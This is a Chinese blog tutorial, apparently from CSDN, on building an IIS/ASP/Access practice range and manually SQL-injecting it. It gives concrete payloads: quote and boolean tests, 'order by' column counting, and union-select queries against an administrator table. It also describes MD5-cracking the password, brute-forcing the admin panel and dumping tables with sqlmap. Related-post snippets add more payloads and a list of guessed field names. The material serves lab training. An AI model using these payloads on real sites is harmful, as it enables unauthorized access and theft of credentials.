access手工注入靶场(附环境搭建)

已于 2024-08-20 17:12:06 修改
阅读量50 收藏 1
点赞数 2
文章标签: 安全
于 2024-08-20 14:16:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45079558/article/details/141352974
版权

环境搭建

先在电脑的搜索框中搜索IIS

如果有则直接使用如果没有则在搜索框中搜索添加或删除程序

进入后点击右边的程序和功能

进入后点击启用或关闭windows功能

选中net3.5和net4.8

继续如图所示选中图中选中的内容

点击确定后即可使用IIS服务器

打开IIS服务器

点击图中的浏览打开网站根目录

将靶场的压缩包解压到当前的根目录下(一键三连截图私聊发靶场压缩包)

点击服务器主页下的IIS下的ASP

将错误发送到浏览器改为‘True’   将启用父路径改为‘True’

点击应用池下的网站的高级设置

将启用32位应用程序改为‘True’

点击绑定,添加

访问IIS服务器绑定的IP地址,即可访问网站靶场。

输入id=1'报错

输入id=1 and 1=1正常

输入id=1 and 1=2报错

判断为数字型

判断字段列数,输入order by 4正常   ,输入order by 5 不正常,判断为4列

news_view.asp?id=14 union select 1,user_name,3,4,5,6,7 from administrator显示正常说明存在这一列
密码进⾏md5解密 并去后台登录 后台地址爆破⼀下
方法二:

用sqlmap工具跑注入点

如下图证明存在sql注入

--tables查表,因为access没有库只有表

使用-T products --dump查数据

亚历山大——纯真丁一郎
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者靶场 入门:SQL手工注入漏洞测试(Access数据库)
qq_43233085的博客
01-10 1200
入门:SQL手工注入漏洞测试(Access数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
Access手工注入靶场环境搭建
2301_82061181的博客
08-20 339
Access手工注入靶场环境搭建
Access手工注入靶场(环境搭建教程)
2401_82451607的博客
08-20 535
Access手工注入靶场
Access手工注入靶场环境搭建教程)
2301_80402555的博客
08-20 288
表名只能靠字节猜测 常见的表名或字段名:admin、users、username、user_name admin_user、administrator。1、百度网盘链接:链接:https://pan.baidu.com/s/1Rl-YsRyD6UsvheTfYmHEkw 提取码:sfln。尝试用户名的字段=user_name时 页面显示正常 返回了用户名为admin。id=10 and 1=1 页面显示正确。id=10 and 1=2 页面报错。id=10' 页面报错。
ACCESS靶场手工注入靶场搭建)
m0_73771249的博客
08-20 335
union select 1,user_name,password,4,5,6,7 from administrator,尝试查看也,页面回显,说明存在password字段。union select 1,user_name,3,4,5,6,7 from administrator,页面回显结果,说明有user_name字段。union select 1,username,3,4,5,6,7 from administrator,报错,说明没有usernam字段。输入用户密码登录后台。
ACCESS手工注入环境搭建教程)
最新发布
2301_78031880的博客
08-20 305
(5)猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd pass_word admin_name admin_username admin_user admin_passwd admin_pwd ..........news_view.asp?id=14 union select 1,user_name,3,4,5,6,7 from administrator //正常,说明存在这⼀列。
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5598
SQL注入环境搭建及多种注入类型测试实验
【墨者学院】SQL手工注入漏洞测试(Access数据库)
weixin_43884770的博客
12-04 1146
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行SQL注入测试,获取管理密码登录。 1、判断注入点: 分别用and...
oracle手工报错注入,注入
weixin_34515601的博客
04-10 454
Spring的常用注解2021-01-21 13:03:49① @Component:使用在普通java类上② @Service:使用在业务层类上作用:声明一个类的对象为bean对象,相当于配置了bean标签。注意:相当于使用的是无参数构造器来创建对象。问题:只使用@Service注解,和 A a=new A();的效果是相同的,创建的是一个没有初始化数据的bean对象,但是在sqlmap2021...
整理比较全的Access SQL注入参考
09-14
Access SQL 注入参考 Access SQL 注入是数据库安全领域中的一种常见的攻击手法,通过向 Access 数据库中注入恶意的 SQL 代码,攻击者可以读取、修改或删除敏感数据。本文档旨在整理 Access SQL 注入的相关知识点,...
SQL注入Access注入手工
12-14
什么是SQL注入? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现...
Access高级注入语句.txt
07-18
根据提供的文件信息,我们可以深入探讨有关Access数据库中的SQL注入技术,特别是高级注入技巧。下面将对文件中的几个关键部分进行详细解析。 ### Access高级注入语句解析 #### 一、Union Injection(联合注入) ...
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 542
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
AI安全-文生图
深度安全实验室
08-15 298
AI安全-文生图
漏洞扫描的重要性,如何做好漏洞扫描服务
dexunyun的博客
08-15 837
总之,系统漏洞扫描是守护网络安全的重要防线之一。通过漏洞扫描VSS,丰富的漏洞规则库,可针对各种类型的网站进行全面深入的漏洞扫描,提供专业全面的扫描报告。德迅云安全可以提供有效应对网络安全威胁的解决方案,为用户网络安全提供安全保障。
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 233
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 458
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值